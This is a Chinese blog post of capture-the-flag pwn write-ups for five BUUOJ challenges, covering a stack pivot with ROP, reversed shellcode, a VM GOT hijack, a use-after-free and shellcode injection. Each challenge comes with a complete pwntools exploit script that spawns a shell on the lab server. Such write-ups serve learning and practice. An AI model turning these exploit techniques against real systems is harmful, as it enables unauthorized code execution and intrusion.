buuoj Pwn writeup 241-245

最新推荐文章于 2023-08-02 15:01:30 发布
最新推荐文章于 2023-08-02 15:01:30 发布
阅读量319 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119518653
版权

241 [GKCTF 2021]checkin

在这里插入图片描述
在这里插入图片描述逻辑也比较简单。

首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。

然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。
我们去看看那个函数。

在这里插入图片描述
好像很复杂。

0x4007f6那个函数点开。
在这里插入图片描述瞬间明白是一个md5.

所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。

在这里插入图片描述
我们发现密码admin的md5加密结果是那个。

所以就直接栈迁移就行。
栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还需要我们先泄露一次libc,再返回回来再次做一次栈迁移,这个怎么做到?

因为我们只能在bss上写三个函数地址,我们三个只能刚刚泄露地址,所以要动点脑筋。

以往我们在用一些puts函数的时候,都是用的库函数,然后返回的时候去找返回值,那么我们这里长度不够,就用点其它的小技巧。
在这里插入图片描述我们用程序里面的一小段程序,puts完之后,直接进入主函数,那么我们的要求就达到了。

exp

# -*- coding: utf-8 -*-

from pwn import *

context.log_level='debug'
 
r = remote("node4.buuoj.cn", "26331")
#r = process("./241")
elf = ELF("./241")
libc = ELF("./libc.so.6")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

pop_rdi = 0x401ab3
puts = 0x4018B5
puts_got = 0x602028
name_addr = 0x602400
 
payload = "admin".ljust(8,'\x00')
payload += p64(pop_rdi) + p64(puts_got) + p64(puts)
r.sendafter(">", payload)

#gdb.attach(r)

payload = "admin\x00\x00\x00"+ p64(0) * 3 + p64(name_addr)
r.sendafter(">", payload)
 
libc_base = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00' ) - libc.sym['puts']
print hex(libc_base)

 
payload = 'admin\x00\x00\x00'*3  +p64(0x4527a+libc_base)
r.sendafter(">", payload)

#gdb.attach(r)

payload = 'admin\x00\x00\x00'*4+ p64(0x602410)
r.sendafter(">", payload)

#payload 这里反复的去写admin是因为在调用过程中经常应为一些原因导致栈的数据被覆盖

r.interactive()

242 [BSidesCF 2019]RunitPlusPlus

在这里插入图片描述在这里插入图片描述逻辑更简单,就是开了个空间,然后让你写入shellcode。
这个shellcode呢会进行一顿操作,你倒着操作回来就行了。

exp

from pwn import *

context(log_level='debug')


r=remote("node4.buuoj.cn",29401)

r.recv()
r.send(asm(shellcraft.sh())[::-1])

r.interactive()

243 ciscn_2019_qual_virtual

在这里插入图片描述在这里插入图片描述
申请了四个空间,第一个是用来放项目名称。
然后可以看得出来,有三个是跟指令有关系的,一个是指令。

下面那个函数可以执行指令,进去看看。
在这里插入图片描述里面显然是一堆不同函数,其中a1是指令,a2,a3应该一个是数据跟操作空间吧。

在这里插入图片描述
指令表在这里。

显然需要一个函数一个函数分析。

最后发现有一个任意写,有一个任意读,劫持got表就好。

# -*- coding: utf-8 -*-
from pwn import *

r = remote("node4.buuoj.cn", 27532)

puts_got = 0x404020

r.recvuntil("name:")
r.sendline("/bin/sh\x00")

r.recvuntil("instruction:")

payload= 'push push load push sub div load push add '
payload+= 'push push load push sub div save '

r.sendline(payload) 
r.recvuntil("data:")

payload = str(8)+' '
payload += str(-4)+' '
payload += str(puts_got+8)+' '
payload += str(-0x2a300)+' '
payload += str(8)+' '
payload += str(-5)+' '
payload += str(puts_got+8)+' '

r.sendline(payload)

r.interactive()

244 wdb_2018_2nd_Fgo

在这里插入图片描述add
在这里插入图片描述双层结构,第一层第一个部分是print函数,第二个部分就是一个size随便大小的chunk。

free
在这里插入图片描述显然是uaf

print
在这里插入图片描述输出。

就是利用uaf把printf那个函数换成system就可以了。

from pwn import *

context.log_level = "debug"

r = remote("node4.buuoj.cn", 25805)
#r = process("./244")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_i386/libc.so.6")
libc = ELF("./32/libc-2.23.so")
elf = ELF("./244")

def add(size, content):
    r.sendlineafter("choice:\n", "1")
    r.sendlineafter("the size of servant's name : \n", str(size))
    r.sendafter("ability : \n", content)
    
def delete(index):
    r.sendlineafter("choice:\n", "2")
    r.sendlineafter("Index : \n", str(index))

def show(index):
    r.sendlineafter("choice:\n", "3")
    r.sendlineafter("Index :", str(index))

puts_got = elf.got['puts']

add(0x20, "aaaa") #0
add(0x20, "aaaa") #1
delete(0)
delete(1)
add(0x8, p32(0x8048956)) #2

show(0)


r.interactive()

245 jarvisoj_calc.exe

在这里插入图片描述没有开NX。

在这里插入图片描述
好家伙。

在这里插入图片描述只能说结构简单。

看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看看

var能够替换功能,把add直接换成shellcode。

tnnd。

exp

from pwn import *

shellcode = asm(shellcraft.sh())

r = remote('node4.buuoj.cn', 26397)

r.sendline('var add = "'+shellcode+'"')
r.sendline('+')

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn Runit&&RunitPlusPlus
stareforever的博客
01-13 1万+
[BSidesCF 2019]Runit 查看保护 IDA查看程序流 读入buf并执行,那么可以写入shellcode 完整ex from pwn import * context(log_level='debug') #io=process("./runit") io=remote("node3.buuoj.cn",28430) io.recv() payload=asm(shellcraft.sh()) io.send(payload) io.interactive() [BSid
[BSidesCF 2019]Runit
z1r0的博客
02-22 2183
[BSidesCF 2019]Runit 查看保护 写入getshell的shellcode即可。或者直接使用pwntools自带的shellcraft.sh from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28471) else: r = proces
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 421
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
刷题 - BUUCTF(BUUOJ) - PWN - DAY3
qq_36902977的博客
08-02 150
buuoj/buuctf pwn 刷题
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 409
buuctf-pwn 001-016题wp
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 421
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 311
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 387
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
ciscn_2019_qual_virtual
z1r0的博客
04-11 318
ciscn_2019_qual_virtual z1r0’s blog
BSidesSF 2019 部分writeup
Kr的博客
03-06 2427
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
[BSidesSF 2019]Mixer ECB加密
a3320315的博客
02-15 1460
题目介绍 这儿需要我们登录,根据题目提示,我们需用admin登录就能拿到flag,我们先随便登录一下试试~~ 这儿返回了cookie,应该是某种加密~~ 但是题目并没有提示,尝试解码也并没有特别明显的线索,后来随便改一下user的值,发现报错,并且返回我们这儿猜测是cbc加密,因为其它的我也不知道 根据题目我们知道,解码应该为 {"first_name":"ma","last_name":"jia...
Buuoj Pwn
VisualNull的博客
05-22 270
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
第一个PWN 栈溢出简单题
qq_41696518的博客
06-16 1111
第一个pwn 栈溢出简单题
BUU PWN(一)
playmaker的博客
01-28 2118
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值